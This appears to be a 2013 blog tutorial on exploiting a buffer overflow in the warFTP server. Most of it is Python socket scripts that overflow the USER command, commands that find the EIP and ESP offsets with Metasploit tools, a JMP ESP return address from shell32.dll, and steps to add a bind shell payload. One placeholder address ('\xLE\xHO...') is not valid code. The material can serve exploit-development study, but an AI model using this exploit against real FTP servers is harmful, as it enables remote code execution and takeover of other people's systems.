Monday, 15 April 2013

Buffer overflow : direct return exploit warFTP application

Open and start warFTP application

test connection to warFTP
nc 192.168.56.101 21


Create fuzzer script with python :
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*1000
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")
send fuzzer to target and see the target crash or not.
Python fuzzftp.py
the target is crash, it means that the target is vulnerable with buffer overflow
open warftp from OllyDbg to start debugging. send the fuzzer again and see what happened.

EIP is overwritten with character A. now replace the A character in fuzzer code with pattern from metasploit pattern_create

open and start again warftp from OllyDbg and send fuzzer again. See what happened.

EIP is overwritten by the pattern created before.
Find pattern offset EIP and ESP with metasploit pattern_offset
./pattern_offset.rb 32714131
The result for EIP is 485.
./pattern_offset.rb q4Aq5Aq
The result for ESP is 493
edit the script and insert EIP and ESP information
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\xLE\xHO\xRM\xWO"
buffer += "\x90"*(493-len(buffer))
buffer += "\xCC"*(1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")

send fuzzer into the target. See the result. Now the EIP and ESP is under controlled.

Next find the JMP ESP command from shell32.dll module with OllyDbg.

Copy the location and insert into the fuzzer script
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer += "\x65\x82\xA5\x7C"
buffer += "\xCC"*(493-len(buffer))
buffer += "\xCC"*(1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")

test the new fuzzer and look the value of EIP

generate the payload from metasploit msfweb and insert into fuzzer script. In this case I will use Bind Shell
send the fuzzer again and try to telnet target. test with telnet to the target, if successful the terminal should be like this :




Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)